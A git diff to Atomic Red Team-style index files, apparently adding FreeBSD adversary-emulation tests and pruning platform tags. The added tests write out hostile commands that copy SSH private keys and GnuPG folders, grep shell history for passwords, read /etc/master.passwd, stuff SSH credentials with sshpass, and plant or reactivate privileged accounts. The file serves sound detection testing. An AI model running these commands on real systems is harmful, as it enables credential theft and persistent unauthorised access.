@@ -60116,6 +62208,41 @@ credential-access: exit 0 cleanup_command: 'rm -rf #{output_folder} + ' + name: sh + - name: Copy Private SSH Keys with CP (freebsd) + auto_generated_guid: 12e4a260-a7fd-4ed8-bf18-1a28c1395775 + description: 'Copy private SSH keys on a FreeBSD system to a staging folder + using the `cp` command. + + ' + supported_platforms: + - linux + input_arguments: + search_path: + description: Path where to start searching from. + type: path + default: "/" + output_folder: + description: Output folder containing copies of SSH private key files + type: path + default: "/tmp/art-staging" + dependency_executor_name: sh + dependencies: + - description: 'Install GNU cp from coreutils package. + + ' + prereq_command: 'if [ ! -x "$(command -v gcp)" ]; then exit 1; else exit 0; + fi; + + ' + get_prereq_command: "(which pkg && pkg install -y coreutils)\n" + executor: + command: | + mkdir #{output_folder} + find #{search_path} -name id_rsa 2>/dev/null -exec gcp --parents {} #{output_folder} \; + cleanup_command: 'rm -rf #{output_folder} + ' name: sh - name: Copy Private SSH Keys with rsync 
@@ -60143,6 +62270,41 @@ credential-access: exit 0 cleanup_command: 'rm -rf #{output_folder} + ' + name: sh + - name: Copy Private SSH Keys with rsync (freebsd) + auto_generated_guid: 922b1080-0b95-42b0-9585-b9a5ea0af044 + description: 'Copy private SSH keys on a FreeBSD system to a staging folder + using the `rsync` command. + + ' + supported_platforms: + - linux + input_arguments: + search_path: + description: Path where to start searching from. + type: path + default: "/" + output_folder: + description: Output folder containing copies of SSH private key files + type: path + default: "/tmp/art-staging" + dependency_executor_name: sh + dependencies: + - description: 'Check if rsync is installed. + + ' + prereq_command: 'if [ ! -x "$(command -v rsync)" ]; then exit 1; else exit + 0; fi; + + ' + get_prereq_command: "(which pkg && pkg install -y rsync)\n" + executor: + command: | + mkdir #{output_folder} + find #{search_path} -name id_rsa 2>/dev/null -exec rsync -R {} #{output_folder} \; + cleanup_command: 'rm -rf #{output_folder} + ' name: sh - name: Copy the users GnuPG directory with rsync 
@@ -60170,6 +62332,41 @@ credential-access: exit 0 cleanup_command: 'rm -rf #{output_folder} + ' + name: sh + - name: Copy the users GnuPG directory with rsync (freebsd) + auto_generated_guid: b05ac39b-515f-48e9-88e9-2f141b5bcad0 + description: 'Copy the users GnuPG (.gnupg) directory on a FreeBSD system to + a staging folder using the `rsync` command. + + ' + supported_platforms: + - linux + input_arguments: + search_path: + description: Path where to start searching from + type: path + default: "/" + output_folder: + description: Output folder containing a copy of the .gnupg directory + type: path + default: "/tmp/GnuPG" + dependency_executor_name: sh + dependencies: + - description: 'Check if rsync is installed. + + ' + prereq_command: 'if [ ! -x "$(command -v rsync)" ]; then exit 1; else exit + 0; fi; + + ' + get_prereq_command: "(which pkg && pkg install -y rsync)\n" + executor: + command: | + mkdir #{output_folder} + find #{search_path} -type d -name '.gnupg' 2>/dev/null -exec rsync -Rr {} #{output_folder} \; + cleanup_command: 'rm -rf #{output_folder} + ' name: sh T1557.001: @@ -60929,6 +63126,32 @@ credential-access: command: 'cat #{bash_history_filename} | grep #{bash_history_grep_args} > #{output_file} + ' + name: sh + - name: Search Through sh History + auto_generated_guid: d87d3b94-05b4-40f2-a80f-99864ffa6803 + description: 'Search through sh history for specifice commands we want to capture + + ' + supported_platforms: + - linux + input_arguments: + output_file: + description: Path where captured results will be placed + type: path + default: "~/loot.txt" + sh_history_grep_args: + description: grep arguments that filter out specific commands we want to + capture + type: path + default: "-e '-p ' -e 'pass' -e 'ssh'" + sh_history_filename: + description: Path of the sh history file to capture + type: path + default: "~/.history" + executor: + command: 'cat #{sh_history_filename} | grep #{sh_history_grep_args} > #{output_file} + ' name: sh T1552.001: 
@@ -61017,7 +63240,6 @@ credential-access: ' supported_platforms: - - linux:freebsd - macos - linux input_arguments: @@ -61036,9 +63258,8 @@ credential-access: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: file_path: description: Path to search @@ -61056,9 +63277,8 @@ credential-access: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: file_path: description: Path to search @@ -62006,6 +64226,37 @@ credential-access: command: | cp "$PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt" /tmp/ for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done + - name: SSH Credential Stuffing From FreeBSD + auto_generated_guid: a790d50e-7ebf-48de-8daa-d9367e0911d4 + description: 'Using username,password combination from a password dump to login + over SSH. + + ' + supported_platforms: + - linux + input_arguments: + target_host: + description: IP Address / Hostname you want to target. + type: string + default: localhost + dependency_executor_name: sh + dependencies: + - description: 'Requires SSHPASS + + ' + prereq_command: 'if [ -x "$(command -v sshpass)" ]; then exit 0; else exit + 1; fi; + + ' + get_prereq_command: 'pkg install -y sshpass + + ' + executor: + name: sh + elevation_required: false + command: | + cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/ + for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done T1208: technique: x_mitre_platforms: 
@@ -62559,11 +64810,29 @@ credential-access: ' name: bash elevation_required: true + - name: Access /etc/master.passwd (Local) + auto_generated_guid: 5076874f-a8e6-4077-8ace-9e5ab54114a5 + description: "/etc/master.passwd file is accessed in FreeBSD environments\n" + supported_platforms: + - linux + input_arguments: + output_file: + description: Path where captured results will be placed + type: path + default: "/tmp/T1003.008.txt" + executor: + command: | + sudo cat /etc/master.passwd > #{output_file} + cat #{output_file} + cleanup_command: 'rm -f #{output_file} + + ' + name: sh + elevation_required: true - name: Access /etc/passwd (Local) auto_generated_guid: 60e860b6-8ae6-49db-ad07-5e73edd88f5d description: "/etc/passwd file is accessed in FreeBSD and Linux environments\n" supported_platforms: - - linux:freebsd - linux input_arguments: output_file: @@ -62585,7 +64854,6 @@ credential-access: ' supported_platforms: - - linux:freebsd - linux input_arguments: output_file: @@ -62609,7 +64877,6 @@ credential-access: ' supported_platforms: - - linux:freebsd - linux input_arguments: output_file: @@ -63692,7 +65959,6 @@ discovery: Upon successful execution, sh will stdout list of usernames. supported_platforms: - - linux:freebsd - linux - macos executor: @@ -64280,7 +66546,6 @@ discovery: ' supported_platforms: - - linux:freebsd - linux input_arguments: output_file: @@ -64299,7 +66564,6 @@ discovery: auto_generated_guid: fed9be70-0186-4bde-9f8a-20945f9370c2 description: "(requires root)\n" supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -64323,7 +66587,6 @@ discovery: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -64346,7 +66609,6 @@ discovery: ' supported_platforms: - - linux:freebsd - linux - macos executor: 
@@ -64395,6 +66657,26 @@ discovery: cat #{output_file} cleanup_command: 'rm -f #{output_file} + ' + name: sh + - name: Show if a user account has ever logged in remotely (freebsd) + auto_generated_guid: 0f73418f-d680-4383-8a24-87bc97fe4e35 + description: 'Show if a user account has ever logged in remotely + + ' + supported_platforms: + - linux + input_arguments: + output_file: + description: Path where captured results will be placed + type: path + default: "/tmp/T1087.001.txt" + executor: + command: | + lastlogin > #{output_file} + cat #{output_file} + cleanup_command: 'rm -f #{output_file} + ' name: sh - name: Enumerate users and groups @@ -64403,7 +66685,6 @@ discovery: ' supported_platforms: - - linux:freebsd - linux - macos executor: @@ -64517,6 +66798,20 @@ discovery: command: | if (systemd-detect-virt) then echo "Virtualization Environment detected"; fi; if (sudo dmidecode | egrep -i 'manufacturer|product|vendor' | grep -iE 'Oracle|VirtualBox|VMWare|Parallels') then echo "Virtualization Environment detected"; fi; + - name: Detect Virtualization Environment (FreeBSD) + auto_generated_guid: e129d73b-3e03-4ae9-bf1e-67fc8921e0fd + description: | + Detects execution in a virtualized environment. + At boot, dmesg stores a log if a hypervisor is detected. + supported_platforms: + - linux + executor: + name: sh + elevation_required: true + command: 'if [ "$(sysctl -n hw.hv_vendor)" != "" ]; then echo "Virtualization + Environment detected"; fi + + ' T1069.002: technique: modified: '2023-04-07T17:16:47.754Z' @@ -64665,6 +66960,18 @@ discovery: ' name: bash + - name: System Service Discovery - service + auto_generated_guid: b2e1c734-7336-40f9-b970-b04731cbaf8a + description: 'Enumerates system service using service + + ' + supported_platforms: + - linux + executor: + command: 'service -e + + ' + name: sh T1040: technique: modified: '2023-04-12T23:31:49.085Z' 
@@ -64782,6 +67089,117 @@ discovery: tshark -c 5 -i #{interface} name: bash elevation_required: true + - name: Packet Capture FreeBSD using tshark or tcpdump + auto_generated_guid: c93f2492-9ebe-44b5-8b45-36574cccfe67 + description: | + Perform a PCAP. Wireshark will be required for tshark. TCPdump may already be installed. + + Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface ens33. + supported_platforms: + - linux + input_arguments: + interface: + description: Specify interface to perform PCAP on. + type: string + default: em0 + dependency_executor_name: sh + dependencies: + - description: 'Check if at least one of tcpdump or tshark is installed. + + ' + prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command + -v tshark)" ]; then exit 1; else exit 0; fi; + + ' + get_prereq_command: "(which pkg && pkg install -y wireshark-nox11)\n" + executor: + command: | + tcpdump -c 5 -nnni #{interface} + tshark -c 5 -i #{interface} + name: sh + elevation_required: true + - name: Packet Capture FreeBSD using /dev/bpfN with sudo + auto_generated_guid: e2028771-1bfb-48f5-b5e6-e50ee0942a14 + description: 'Opens a /dev/bpf file (O_RDONLY) and captures packets for a few + seconds. + + ' + supported_platforms: + - linux + input_arguments: + ifname: + description: Specify interface to perform PCAP on. 
+ type: string + default: em0 + csource_path: + description: Path to C program source + type: string + default: PathToAtomicsFolder/T1040/src/freebsd_pcapdemo.c + program_path: + description: Path to compiled C program + type: string + default: "/tmp/t1040_freebsd_pcapdemo" + dependency_executor_name: sh + dependencies: + - description: 'compile C program + + ' + prereq_command: 'exit 1 + + ' + get_prereq_command: 'cc #{csource_path} -o #{program_path} + + ' + executor: + command: 'sudo #{program_path} -i #{ifname} -t 3 + + ' + cleanup_command: 'rm -f #{program_path} + + ' + name: sh + elevation_required: true + - name: Filtered Packet Capture FreeBSD using /dev/bpfN with sudo + auto_generated_guid: a3a0d4c9-c068-4563-a08d-583bd05b884c + description: 'Opens a /dev/bpf file (O_RDONLY), sets BPF filter for ''udp'' + and captures packets for a few seconds. + + ' + supported_platforms: + - linux + input_arguments: + ifname: + description: Specify interface to perform PCAP on. + type: string + default: em0 + csource_path: + description: Path to C program source + type: string + default: PathToAtomicsFolder/T1040/src/freebsd_pcapdemo.c + program_path: + description: Path to compiled C program + type: string + default: "/tmp/t1040_freebsd_pcapdemo" + dependency_executor_name: sh + dependencies: + - description: 'compile C program + + ' + prereq_command: 'exit 1 + + ' + get_prereq_command: 'cc #{csource_path} -o #{program_path} + + ' + executor: + command: 'sudo #{program_path} -f -i #{ifname} -t 3 + + ' + cleanup_command: 'rm -f #{program_path} + + ' + name: sh + elevation_required: true - name: Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo auto_generated_guid: 10c710c9-9104-4d5f-8829-5b65391e2a29 description: 'Captures packets with domain=AF_PACKET, type=SOCK_RAW for a few 
@@ -65023,6 +67441,38 @@ discovery: ' name: bash elevation_required: true + - name: Network Share Discovery - FreeBSD + auto_generated_guid: 77e468a6-3e5c-45a1-9948-c4b5603747cb + description: 'Network Share Discovery using smbstatus + + ' + supported_platforms: + - linux + input_arguments: + package_checker: + description: Package checking command. pkg info -x samba + type: string + default: "(pkg info -x samba &>/dev/null)" + package_installer: + description: Package installer command. pkg install -y samba413 + type: string + default: "(which pkg && pkg install -y samba413)" + dependency_executor_name: sh + dependencies: + - description: 'Package with smbstatus (samba) must exist on device + + ' + prereq_command: 'if #{package_checker} > /dev/null; then exit 0; else exit + 1; fi + + ' + get_prereq_command: "#{package_installer} \n" + executor: + command: 'smbstatus --shares + + ' + name: sh + elevation_required: true T1120: technique: modified: '2023-03-30T21:01:41.575Z' @@ -65162,7 +67612,6 @@ discovery: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -65217,13 +67666,24 @@ discovery: sudo lsmod | grep -i "virtio_pci\|virtio_net" sudo lsmod | grep -i "hv_vmbus\|hv_blkvsc\|hv_netvsc\|hv_utils\|hv_storvsc" name: bash + - name: FreeBSD VM Check via Kernel Modules + auto_generated_guid: eefe6a49-d88b-41d8-8fc2-b46822da90d3 + description: 'Identify virtual machine host kernel modules. + + ' + supported_platforms: + - linux + executor: + command: | + kldstat | grep -i "vmm" + kldstat | grep -i "vbox" + name: sh - name: Hostname Discovery auto_generated_guid: 486e88ea-4f56-470f-9b57-3f4d73f39133 description: 'Identify system hostname for FreeBSD, Linux and macOS systems. ' supported_platforms: - - linux:freebsd - linux - macos executor: @@ -65238,9 +67698,8 @@ discovery: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos executor: command: 'env 
@@ -65261,6 +67720,20 @@ discovery: kmod list grep vmw /proc/modules name: sh + - name: FreeBSD List Kernel Modules + auto_generated_guid: 4947897f-643a-4b75-b3f5-bed6885749f6 + description: 'Enumerate kernel modules loaded. Upon successful execution stdout + will display kernel modules loaded, followed by list of modules matching ''vmm'' + if present. + + ' + supported_platforms: + - linux + executor: + command: | + kldstat + kldstat | grep vmm + name: sh T1010: technique: modified: '2023-04-15T16:46:04.776Z' @@ -65679,7 +68152,6 @@ discovery: ' supported_platforms: - - linux:freebsd - linux input_arguments: output_file: @@ -65692,6 +68164,28 @@ discovery: cat #{output_file} 2>/dev/null cleanup_command: 'rm -f #{output_file} 2>/dev/null + ' + name: sh + - name: List Google Chromium Bookmark JSON Files on FreeBSD + auto_generated_guid: 88ca025b-3040-44eb-9168-bd8af22b82fa + description: 'Searches for Google Chromium''s Bookmark file (on FreeBSD) that + contains bookmarks in JSON format and lists any found instances to a text + file. + + ' + supported_platforms: + - linux + input_arguments: + output_file: + description: Path where captured results will be placed. + type: path + default: "/tmp/T1217-Chrome.txt" + executor: + command: | + find / -path "*/.config/chromium/*/Bookmarks" -exec echo {} >> #{output_file} \; + cat #{output_file} 2>/dev/null + cleanup_command: 'rm -f #{output_file} 2>/dev/null + ' name: sh T1016: 
@@ -65788,6 +68282,20 @@ discovery: if [ -x "$(command -v ip)" ]; then ip addr; else echo "ip is missing from the machine. skipping..."; fi; if [ -x "$(command -v netstat)" ]; then netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c; else echo "netstat is missing from the machine. skipping..."; fi; name: sh + - name: System Network Configuration Discovery (freebsd) + auto_generated_guid: 7625b978-4efd-47de-8744-add270374bee + description: | + Identify network configuration information. + + Upon successful execution, sh will spawn multiple commands and output will be via stdout. + supported_platforms: + - linux + executor: + command: | + if [ -x "$(command -v arp)" ]; then arp -a; else echo "arp is missing from the machine. skipping..."; fi; + if [ -x "$(command -v ifconfig)" ]; then ifconfig; else echo "ifconfig is missing from the machine. skipping..."; fi; + if [ -x "$(command -v netstat)" ]; then netstat -Sp tcp | awk '{print $NF}' | grep -v '[[:lower:]]' | sort | uniq -c; else echo "netstat is missing from the machine. skipping..."; fi; + name: sh T1087: technique: modified: '2023-04-15T17:24:23.029Z' @@ -66006,9 +68514,8 @@ discovery: https://perishablepress.com/list-files-folders-recursively-terminal/ supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: output_file: description: Output file used to store the results. @@ -66034,9 +68541,8 @@ discovery: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: output_file: description: Output file used to store the results. @@ -66139,7 +68645,6 @@ discovery: Upon successful execution, sh will execute `netstat` and `who -a`. Results will output via stdout. supported_platforms: - - linux:freebsd - linux - macos dependency_executor_name: sh @@ -66423,7 +68928,6 @@ discovery: Upon successful execution, sh will execute ps and output to /tmp/loot.txt. supported_platforms: - - linux:freebsd - linux - macos input_arguments: 
@@ -66575,9 +69079,8 @@ discovery: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos executor: command: | if [ -x "$(command -v dscacheutil)" ]; then dscacheutil -q group; else echo "dscacheutil is missing from the machine. skipping..."; fi; @@ -66670,6 +69173,18 @@ discovery: ' name: bash + - name: Examine password complexity policy - FreeBSD + auto_generated_guid: a7893624-a3d7-4aed-9676-80498f31820f + description: 'Lists the password complexity policy to console on FreeBSD. + + ' + supported_platforms: + - linux + executor: + command: 'cat /etc/pam.d/passwd + + ' + name: sh - name: Examine password complexity policy - CentOS/RHEL 7.x auto_generated_guid: 78a12e65-efff-4617-bc01-88f17d71315d description: 'Lists the password complexity policy to console on CentOS/RHEL @@ -66819,7 +69334,6 @@ discovery: Upon successful execution, the output will contain the environment variables that indicate the 5 character locale that can be looked up to correlate the language and territory. supported_platforms: - - linux:freebsd - linux executor: command: 'locale @@ -66877,7 +69391,6 @@ discovery: also used as a builtin command that does not generate syscall telemetry but does provide a list of the environment variables. supported_platforms: - - linux:freebsd - linux dependency_executor_name: sh dependencies: @@ -67092,6 +69605,18 @@ discovery: executor: command: 'ps aux | egrep ''falcond|nessusd|cbagentd|td-agent|packetbeat|filebeat|auditbeat|osqueryd'' + ' + name: sh + - name: Security Software Discovery - pgrep (FreeBSD) + auto_generated_guid: fa96c21c-5fd6-4428-aa28-51a2fbecdbdc + description: | + Methods to identify Security Software on an endpoint + when sucessfully executed, command shell is going to display AV/Security software it is running. + supported_platforms: + - linux + executor: + command: 'pgrep -l ''bareos-fd|icinga2|cbagentd|wazuh-agent|packetbeat|filebeat|osqueryd'' + ' name: sh T1526: 
@@ -67242,7 +69767,6 @@ discovery: Upon successful execution, sh will execute arp to list out the arp cache. Output will be via stdout. supported_platforms: - - linux:freebsd - linux - macos dependency_executor_name: sh @@ -67268,7 +69792,6 @@ discovery: Upon successful execution, sh will perform a ping sweep on the 192.168.1.1/24 and echo via stdout if an IP is active. supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -67332,6 +69855,18 @@ discovery: executor: command: 'ip route show + ' + name: sh + - name: Remote System Discovery - netstat + auto_generated_guid: d2791d72-b67f-4615-814f-ec824a91f514 + description: 'Use the netstat command to display the kernels routing tables. + + ' + supported_platforms: + - linux + executor: + command: 'netstat -r | grep default + ' name: sh - name: Remote System Discovery - ip tcp_metrics 
@@ -67504,6 +70039,44 @@ discovery: nc -nv #{host} #{port} name: sh elevation_required: true + - name: Port Scan Nmap for FreeBSD + auto_generated_guid: f03d59dc-0e3b-428a-baeb-3499552c7048 + description: | + Scan ports to check for listening ports with Nmap. + + Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of addresses on port 80 to determine if listening. Results will be via stdout. + supported_platforms: + - linux + input_arguments: + host: + description: Host to scan. + type: string + default: 192.168.1.1 + port: + description: Ports to scan. + type: string + default: '80' + network_range: + description: Network Range to Scan. + type: string + default: 192.168.1.0/24 + dependency_executor_name: sh + dependencies: + - description: 'Check if nmap command exists on the machine + + ' + prereq_command: 'if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1; + fi; + + ' + get_prereq_command: "(which pkg && pkg install -y nmap)\n" + executor: + command: | + nmap -sS #{network_range} -p #{port} + telnet #{host} #{port} + nc -nv #{host} #{port} + name: sh + elevation_required: true T1518: technique: modified: '2023-03-30T21:01:50.920Z' @@ -67747,7 +70320,19 @@ discovery: x_mitre_attack_spec_version: 3.1.0 x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 identifier: T1124 - atomic_tests: [] + atomic_tests: + - name: System Time Discovery in FreeBSD/macOS + auto_generated_guid: f449c933-0891-407f-821e-7916a21a1a6f + description: "Identify system time. Upon execution, the local computer system + time and timezone will be displayed. \n" + supported_platforms: + - linux + - macos + executor: + command: 'date + + ' + name: sh resource-development: T1583: technique: @@ -73810,7 +76395,6 @@ impact: ' supported_platforms: - - linux:freebsd - linux input_arguments: pwd_for_encrypted_file: 
@@ -73856,7 +76440,6 @@ impact: ' supported_platforms: - - linux:freebsd - linux input_arguments: pwd_for_encrypted_file: @@ -73895,7 +76478,6 @@ impact: ' supported_platforms: - - linux:freebsd - linux input_arguments: cped_file_path: @@ -73946,7 +76528,6 @@ impact: ' supported_platforms: - - linux:freebsd - linux input_arguments: private_key_path: @@ -74364,9 +76945,8 @@ impact: This test simulates a high CPU load as you might observe during cryptojacking attacks. End the test by using CTRL/CMD+C to break. supported_platforms: - - linux:freebsd - - macos - linux + - macos executor: command: 'yes > /dev/null @@ -74529,7 +77109,6 @@ impact: Overwrites and deletes a file using DD. To stop the test, break the command with CTRL/CMD+C. supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -74928,9 +77507,8 @@ impact: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: timeout: description: Time to restart (can be minutes or specific time) @@ -74948,9 +77526,8 @@ impact: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: timeout: description: Time to shutdown (can be minutes or specific time) @@ -74968,9 +77545,8 @@ impact: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos executor: command: 'reboot @@ -74983,7 +77559,6 @@ impact: ' supported_platforms: - - linux:freebsd - linux executor: command: 'halt -p @@ -74991,6 +77566,19 @@ impact: ' name: sh elevation_required: true + - name: Reboot System via `halt` - FreeBSD + auto_generated_guid: 7b1cee42-320f-4890-b056-d65c8b884ba5 + description: 'This test restarts a FreeBSD system using `halt`. + + ' + supported_platforms: + - linux + executor: + command: 'halt -r + + ' + name: sh + elevation_required: true - name: Reboot System via `halt` - Linux auto_generated_guid: 78f92e14-f1e9-4446-b3e9-f1b921f2459e description: 'This test restarts a Linux system using `halt`. 
@@ -75010,7 +77598,6 @@ impact: ' supported_platforms: - - linux:freebsd - linux executor: command: 'poweroff @@ -75018,6 +77605,19 @@ impact: ' name: sh elevation_required: true + - name: Reboot System via `poweroff` - FreeBSD + auto_generated_guid: 5a282e50-86ff-438d-8cef-8ae01c9e62e1 + description: 'This test restarts a FreeBSD system using `poweroff`. + + ' + supported_platforms: + - linux + executor: + command: 'poweroff -r 3 + + ' + name: sh + elevation_required: true - name: Reboot System via `poweroff` - Linux auto_generated_guid: 61303105-ff60-427b-999e-efb90b314e41 description: 'This test restarts a Linux system using `poweroff`. @@ -76619,6 +79219,23 @@ initial-access: whoami exit cleanup_command: "userdel -r art \n" + - name: Create local account (FreeBSD) + auto_generated_guid: 95158cc9-8f6d-4889-9531-9be3f7f095e0 + description: 'An adversary may wish to create an account with admin privileges + to work with. In this test we create a "art" user with the password art, switch + to art, execute whoami, exit and delete the art user. + + ' + supported_platforms: + - linux + executor: + name: sh + elevation_required: true + command: "pw useradd art -g wheel -s /bin/sh\necho $(openssl passwd -1 art) + | pw mod user testuser1 -h 0 \nsu art\nwhoami\nexit\n" + cleanup_command: 'rmuser -y art + + ' - name: Reactivate a locked/expired account (Linux) auto_generated_guid: d2b95631-62d7-45a3-aaef-0972cea97931 description: "A system administrator may have locked and expired a user account 
@@ -76642,6 +79259,30 @@ initial-access: whoami exit cleanup_command: "userdel -r art \n" + - name: Reactivate a locked/expired account (FreeBSD) + auto_generated_guid: '09e3380a-fae5-4255-8b19-9950be0252cf' + description: "A system administrator may have locked and expired a user account + rather than deleting it. \"the user is coming back, at some stage\" An adversary + may reactivate a inactive account in an attempt to appear legitimate. \n\nIn + this test we create a \"art\" user with the password art, lock and expire + the account, try to su to art and fail, unlock and renew the account, su successfully, + then delete the account.\n" + supported_platforms: + - linux + executor: + name: sh + elevation_required: true + command: | + pw useradd art -g wheel -s /bin/sh + echo $(openssl passwd -1 art) | pw mod user testuser1 -h 0 + pw lock art + pw usermod art -e +1d + pw unlock art + pw user mod art -e +99d + su art + whoami + exit + cleanup_command: "rmuser -y art \n" - name: Login as nobody (Linux) auto_generated_guid: 3d2cd093-ee05-41bd-a802-59ee5c301b85 description: 'An adversary may try to re-purpose a system account to appear 
@@ -76660,6 +79301,26 @@ initial-access: nobody\nsu nobody\nwhoami\nexit\n" cleanup_command: "chsh --shell /usr/sbin/nologin nobody\ncat /etc/passwd |grep nobody \n# -> nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n" + - name: Login as nobody (freebsd) + auto_generated_guid: 16f6374f-7600-459a-9b16-6a88fd96d310 + description: 'An adversary may try to re-purpose a system account to appear + legitimate. In this test change the login shell of the nobody account, change + its password to nobody, su to nobody, exit, then reset nobody''s shell to + /usr/sbin/nologin. + + ' + supported_platforms: + - linux + executor: + name: sh + elevation_required: true + command: "cat /etc/passwd |grep nobody \n# -> nobody:x:65534:65534:Unprivileged + user:/nonexistent:/usr/sbin/nologin\npw usermod nobody -s /bin/sh\necho + $(openssl passwd -1 art) | pw mod user nobody -h 0\nsu nobody\nwhoami\nexit\n" + cleanup_command: | + pw usermod nobody -s /usr/sbin/nologin + cat /etc/passwd |grep nobody + # -> nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin exfiltration: T1567: technique: @@ -77126,7 +79787,6 @@ exfiltration: supported_platforms: - macos - linux - - linux:freebsd input_arguments: input_file: description: Test file to upload @@ -77283,7 +79943,6 @@ exfiltration: supported_platforms: - macos - linux - - linux:freebsd input_arguments: domain: description: target SSH domain @@ -77305,7 +79964,6 @@ exfiltration: supported_platforms: - macos - linux - - linux:freebsd input_arguments: user_name: description: username for domain @@ -77565,7 +80223,6 @@ exfiltration: supported_platforms: - macos - linux - - linux:freebsd input_arguments: file_name: description: File name @@ -77849,7 +80506,6 @@ exfiltration: supported_platforms: - macos - linux - - linux:freebsd executor: steps: | 1. Victim System Configuration: 
@@ -77872,7 +80528,6 @@ exfiltration: ' supported_platforms: - - linux:freebsd - linux executor: steps: "1. On the adversary machine run the below command.\n\n tshark -f @@ -77900,4 +80555,21 @@ exfiltration: command: 'if [ $(which python3) ]; then cd /tmp; python3 -m http.server 9090 & PID=$!; sleep 10; kill $PID; unset PID; fi + ' + - name: Python3 http.server (freebsd) + auto_generated_guid: 57a303a2-0bc6-400d-b144-4f3292920a0b + description: 'An adversary may use the python3 standard library module http.server + to exfiltrate data. This test checks if python3.9 is available and if so, + creates a HTTP server on port 9090, captures the PID, sleeps for 10 seconds, + then kills the PID and unsets the $PID variable. + + ' + supported_platforms: + - linux + executor: + name: sh + elevation_required: false + command: 'if [ $(which python3.9) ]; then cd /tmp; python3.9 -m http.server + 9090 & PID=$!; sleep 10; kill $PID; unset PID; fi + ' diff --git a/atomics/Indexes/macos-index.yaml b/atomics/Indexes/macos-index.yaml index 16801a150f..2e8b758a81 100644 --- a/atomics/Indexes/macos-index.yaml +++ b/atomics/Indexes/macos-index.yaml @@ -829,9 +829,8 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: numeric_mode: description: Specified numeric mode value @@ -853,9 +852,8 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: symbolic_mode: description: Specified symbolic mode value @@ -877,9 +875,8 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: numeric_mode: description: Specified numeric mode value @@ -901,9 +898,8 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: symbolic_mode: description: Specified symbolic mode value 
@@ -978,9 +974,8 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: owner: description: Username of desired owner @@ -2329,7 +2324,6 @@ defense-evasion: supported_platforms: - macos - linux - - linux:freebsd input_arguments: test_message: description: Test message to echo out to the screen @@ -4480,7 +4474,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -4518,7 +4511,6 @@ defense-evasion: description: "Use Perl to decode a base64-encoded text string and echo it to the console \n" supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -4586,7 +4578,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -5449,7 +5440,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -5481,7 +5471,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -5516,7 +5505,6 @@ defense-evasion: Setting the creation timestamp requires changing the system clock and reverting. Sudo or root privileges are required to change date. Use with caution. supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -5543,7 +5531,6 @@ defense-evasion: This technique was used by the threat actor Rocke during the compromise of Linux web servers. supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -7190,9 +7177,8 @@ defense-evasion: Upon successful execution, dd will modify `/tmp/evil-binary`, therefore the expected hash will change. supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: file_to_pad: description: Path of binary to be padded 
@@ -7225,9 +7211,8 @@ defense-evasion: Upon successful execution, truncate will modify `/tmp/evil-binary`, therefore the expected hash will change. supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: file_to_pad: description: Path of binary to be padded @@ -13976,7 +13961,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -14008,7 +13992,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -14039,7 +14022,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -15686,7 +15668,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -15724,7 +15705,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -17093,7 +17073,6 @@ defense-evasion: ' supported_platforms: - - linux:freebsd - linux - macos executor: @@ -20447,9 +20426,8 @@ privilege-escalation: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: command: description: Command to execute @@ -29881,9 +29859,8 @@ execution: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: command: description: Command to execute @@ -32038,7 